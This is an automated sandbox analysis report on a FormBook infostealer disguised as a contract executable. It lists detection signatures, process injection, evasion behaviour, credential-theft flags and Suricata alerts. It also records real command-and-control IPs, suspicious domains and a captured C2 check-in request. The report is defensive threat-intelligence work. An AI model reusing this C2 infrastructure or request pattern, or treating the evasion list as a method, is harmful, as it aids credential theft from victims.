Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
draft contract for order #782334.exe

Overview

General Information

Sample name:draft contract for order #782334.exe
Analysis ID:1546621
MD5:dab7306baf4c0e52d2357f48b7a12911
SHA1:52c04bd5512ba50072c4169bd6bf54af7b3557ee
SHA256:c55ad029c3701a693dd7bebefc90a13766f75972819faacc93fd1b57039f26b6
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • draft contract for order #782334.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\draft contract for order #782334.exe" MD5: DAB7306BAF4C0E52D2357F48B7A12911)
    • draft contract for order #782334.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\draft contract for order #782334.exe" MD5: DAB7306BAF4C0E52D2357F48B7A12911)
      • RprkEKYwQARXc.exe (PID: 4444 cmdline: "C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PATHPING.EXE (PID: 3512 cmdline: "C:\Windows\SysWOW64\PATHPING.EXE" MD5: 078AD26F906EF2AC1661FCAC84084256)
          • RprkEKYwQARXc.exe (PID: 3608 cmdline: "C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.draft contract for order #782334.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.draft contract for order #782334.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T09:17:16.126422+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449735TCP
                2024-11-01T09:17:45.079358+010020229301A Network Trojan was detected172.202.163.200443192.168.2.462632TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T09:17:52.985977+010020507451Malware Command and Control Activity Detected192.168.2.4626333.33.130.19080TCP
                2024-11-01T09:18:16.416013+010020507451Malware Command and Control Activity Detected192.168.2.462737172.67.131.3280TCP
                2024-11-01T09:18:31.975253+010020507451Malware Command and Control Activity Detected192.168.2.462821103.191.208.13780TCP
                2024-11-01T09:18:54.500417+010020507451Malware Command and Control Activity Detected192.168.2.4629103.33.130.19080TCP
                2024-11-01T09:19:10.801113+010020507451Malware Command and Control Activity Detected192.168.2.4629143.33.130.19080TCP
                2024-11-01T09:19:25.033196+010020507451Malware Command and Control Activity Detected192.168.2.46291838.47.232.16080TCP
                2024-11-01T09:19:40.303371+010020507451Malware Command and Control Activity Detected192.168.2.46292234.92.109.13180TCP
                2024-11-01T09:19:53.887832+010020507451Malware Command and Control Activity Detected192.168.2.462926162.0.211.14380TCP
                2024-11-01T09:20:07.678371+010020507451Malware Command and Control Activity Detected192.168.2.462930195.110.124.13380TCP
                2024-11-01T09:20:21.368464+010020507451Malware Command and Control Activity Detected192.168.2.462934185.68.16.9480TCP
                2024-11-01T09:20:35.599498+010020507451Malware Command and Control Activity Detected192.168.2.462938163.44.176.1280TCP
                2024-11-01T09:20:49.147633+010020507451Malware Command and Control Activity Detected192.168.2.462942199.59.243.22780TCP
                2024-11-01T09:21:05.553474+010020507451Malware Command and Control Activity Detected192.168.2.462946103.233.82.5880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T09:17:52.985977+010028554651A Network Trojan was detected192.168.2.4626333.33.130.19080TCP
                2024-11-01T09:18:16.416013+010028554651A Network Trojan was detected192.168.2.462737172.67.131.3280TCP
                2024-11-01T09:18:31.975253+010028554651A Network Trojan was detected192.168.2.462821103.191.208.13780TCP
                2024-11-01T09:18:54.500417+010028554651A Network Trojan was detected192.168.2.4629103.33.130.19080TCP
                2024-11-01T09:19:10.801113+010028554651A Network Trojan was detected192.168.2.4629143.33.130.19080TCP
                2024-11-01T09:19:25.033196+010028554651A Network Trojan was detected192.168.2.46291838.47.232.16080TCP
                2024-11-01T09:19:40.303371+010028554651A Network Trojan was detected192.168.2.46292234.92.109.13180TCP
                2024-11-01T09:19:53.887832+010028554651A Network Trojan was detected192.168.2.462926162.0.211.14380TCP
                2024-11-01T09:20:07.678371+010028554651A Network Trojan was detected192.168.2.462930195.110.124.13380TCP
                2024-11-01T09:20:21.368464+010028554651A Network Trojan was detected192.168.2.462934185.68.16.9480TCP
                2024-11-01T09:20:35.599498+010028554651A Network Trojan was detected192.168.2.462938163.44.176.1280TCP
                2024-11-01T09:20:49.147633+010028554651A Network Trojan was detected192.168.2.462942199.59.243.22780TCP
                2024-11-01T09:21:05.553474+010028554651A Network Trojan was detected192.168.2.462946103.233.82.5880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T09:18:08.753198+010028554641A Network Trojan was detected192.168.2.462694172.67.131.3280TCP
                2024-11-01T09:18:11.271335+010028554641A Network Trojan was detected192.168.2.462710172.67.131.3280TCP
                2024-11-01T09:18:13.849533+010028554641A Network Trojan was detected192.168.2.462726172.67.131.3280TCP
                2024-11-01T09:18:23.679834+010028554641A Network Trojan was detected192.168.2.462773103.191.208.13780TCP
                2024-11-01T09:18:26.278057+010028554641A Network Trojan was detected192.168.2.462789103.191.208.13780TCP
                2024-11-01T09:18:28.819040+010028554641A Network Trojan was detected192.168.2.462805103.191.208.13780TCP
                2024-11-01T09:18:46.803393+010028554641A Network Trojan was detected192.168.2.4629033.33.130.19080TCP
                2024-11-01T09:18:48.488897+010028554641A Network Trojan was detected192.168.2.4629083.33.130.19080TCP
                2024-11-01T09:18:51.052223+010028554641A Network Trojan was detected192.168.2.4629093.33.130.19080TCP
                2024-11-01T09:19:00.170351+010028554641A Network Trojan was detected192.168.2.4629113.33.130.19080TCP
                2024-11-01T09:19:02.751946+010028554641A Network Trojan was detected192.168.2.4629123.33.130.19080TCP
                2024-11-01T09:19:05.308699+010028554641A Network Trojan was detected192.168.2.4629133.33.130.19080TCP
                2024-11-01T09:19:17.040909+010028554641A Network Trojan was detected192.168.2.46291538.47.232.16080TCP
                2024-11-01T09:19:19.710329+010028554641A Network Trojan was detected192.168.2.46291638.47.232.16080TCP
                2024-11-01T09:19:22.334592+010028554641A Network Trojan was detected192.168.2.46291738.47.232.16080TCP
                2024-11-01T09:19:32.600217+010028554641A Network Trojan was detected192.168.2.46291934.92.109.13180TCP
                2024-11-01T09:19:35.240845+010028554641A Network Trojan was detected192.168.2.46292034.92.109.13180TCP
                2024-11-01T09:19:37.693971+010028554641A Network Trojan was detected192.168.2.46292134.92.109.13180TCP
                2024-11-01T09:19:46.130370+010028554641A Network Trojan was detected192.168.2.462923162.0.211.14380TCP
                2024-11-01T09:19:48.691019+010028554641A Network Trojan was detected192.168.2.462924162.0.211.14380TCP
                2024-11-01T09:19:51.325066+010028554641A Network Trojan was detected192.168.2.462925162.0.211.14380TCP
                2024-11-01T09:19:59.940856+010028554641A Network Trojan was detected192.168.2.462927195.110.124.13380TCP
                2024-11-01T09:20:02.478341+010028554641A Network Trojan was detected192.168.2.462928195.110.124.13380TCP
                2024-11-01T09:20:05.087084+010028554641A Network Trojan was detected192.168.2.462929195.110.124.13380TCP
                2024-11-01T09:20:13.788073+010028554641A Network Trojan was detected192.168.2.462931185.68.16.9480TCP
                2024-11-01T09:20:16.409534+010028554641A Network Trojan was detected192.168.2.462932185.68.16.9480TCP
                2024-11-01T09:20:18.868973+010028554641A Network Trojan was detected192.168.2.462933185.68.16.9480TCP
                2024-11-01T09:20:27.968512+010028554641A Network Trojan was detected192.168.2.462935163.44.176.1280TCP
                2024-11-01T09:20:30.492452+010028554641A Network Trojan was detected192.168.2.462936163.44.176.1280TCP
                2024-11-01T09:20:33.034157+010028554641A Network Trojan was detected192.168.2.462937163.44.176.1280TCP
                2024-11-01T09:20:41.499262+010028554641A Network Trojan was detected192.168.2.462939199.59.243.22780TCP
                2024-11-01T09:20:44.002826+010028554641A Network Trojan was detected192.168.2.462940199.59.243.22780TCP
                2024-11-01T09:20:46.584377+010028554641A Network Trojan was detected192.168.2.462941199.59.243.22780TCP
                2024-11-01T09:20:56.334843+010028554641A Network Trojan was detected192.168.2.462943103.233.82.5880TCP
                2024-11-01T09:20:58.897359+010028554641A Network Trojan was detected192.168.2.462944103.233.82.5880TCP
                2024-11-01T09:21:02.477011+010028554641A Network Trojan was detected192.168.2.462945103.233.82.5880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: draft contract for order #782334.exeReversingLabs: Detection: 65%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4137334870.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2091993107.0000000001B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: draft contract for order #782334.exeJoe Sandbox ML: detected
                Source: draft contract for order #782334.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: draft contract for order #782334.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: pathping.pdb source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135009104.0000000001278000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RprkEKYwQARXc.exe, 00000006.00000000.2004979682.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4134690606.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: pathping.pdbGCTL source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135009104.0000000001278000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2091729333.000000000345D000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2090106360.00000000032A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hmRI.pdbSHA256 source: draft contract for order #782334.exe
                Source: Binary string: wntdll.pdb source: draft contract for order #782334.exe, draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2091729333.000000000345D000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2090106360.00000000032A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hmRI.pdb source: draft contract for order #782334.exe
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BBC160 FindFirstFileW,FindNextFileW,FindClose,7_2_02BBC160
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 4x nop then xor eax, eax7_2_02BA9DD0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 4x nop then mov ebx, 00000004h7_2_035004DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62694 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62633 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62633 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62726 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62737 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62737 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62821 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62821 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62789 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62908 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62915 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62805 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62919 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62903 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62923 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62931 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62909 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62910 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62918 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62938 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62940 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62922 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62922 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62910 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62938 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62914 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62914 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62932 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62924 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62921 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62920 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62918 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62912 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62939 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62917 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62937 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62941 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62933 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62927 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62916 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62913 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62935 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62934 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62925 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62934 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62946 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62710 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62936 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62946 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62928 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62944 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62773 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62926 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62926 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62942 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:62930 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62942 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:62930 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62943 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62911 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62945 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:62929 -> 195.110.124.133:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.deepfy.xyz
                Source: DNS query: www.cmdh1c.xyz
                Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
                Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
                Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:62632
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49735
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /a1y9/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.litsgs.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
